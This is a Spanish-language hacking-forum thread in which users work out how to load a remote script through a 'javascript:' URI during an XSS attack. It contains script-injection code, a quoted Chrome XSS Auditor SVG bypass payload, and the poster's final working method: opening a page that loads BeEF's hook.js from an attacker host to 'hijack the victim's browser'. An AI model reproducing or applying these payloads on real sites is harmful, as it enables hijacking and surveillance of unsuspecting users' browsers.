elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Cómo incluir un script de otra página utilizando "javascript:"?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cómo incluir un script de otra página utilizando "javascript:"?  (Leído 3,130 veces)
Ethicalsk

Desconectado Desconectado

Mensajes: 113



Ver Perfil
Cómo incluir un script de otra página utilizando "javascript:"?
« en: 12 Octubre 2017, 14:53 pm »

Buenas! la forma que conozco para agregar un script de otra página es:

Código
  1. <script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código
  1. javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código
  1. javascript:src="www.web.com/script.js"

tampoco funcionó:

Código
  1. javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!


En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Cómo incluir un script de otra página utilizando "javascript:"?
« Respuesta #1 en: 12 Octubre 2017, 17:29 pm »

Código
  1. javascript:
  2. var src="http://loquesea.com/script.js";
  3. var element1 = document.createElement("script");
  4. element1.src = src;
  5. element1.type="text/javascript";
  6. document.getElementsByTagName("head")[0].appendChild(element1);
  7.  

Lo puse por línea para que sea legible, simplemente copia eso como marcador y cambia el src por el de tu gusto


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Ethicalsk

Desconectado Desconectado

Mensajes: 113



Ver Perfil
Re: Cómo incluir un script de otra página utilizando "javascript:"?
« Respuesta #2 en: 12 Octubre 2017, 21:58 pm »

Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:



según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!
« Última modificación: 12 Octubre 2017, 21:59 pm por Ethicalsk » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Cómo incluir un script de otra página utilizando "javascript:"?
« Respuesta #3 en: 12 Octubre 2017, 22:12 pm »

el script está incluido... no tienes que cargar alguna funciòn o algo? no depende de otro? revisaste las peticiones a ver si no están fallando?
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Ethicalsk

Desconectado Desconectado

Mensajes: 113



Ver Perfil
Re: Cómo incluir un script de otra página utilizando "javascript:"?
« Respuesta #4 en: 12 Octubre 2017, 22:28 pm »

Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:

Código:
<html>
<head>
<script src="http://mi_dns:3000/hook.js"></script>
</head>
<body>
</body>
</html>

con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!

 
« Última modificación: 13 Octubre 2017, 01:19 am por Ethicalsk » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines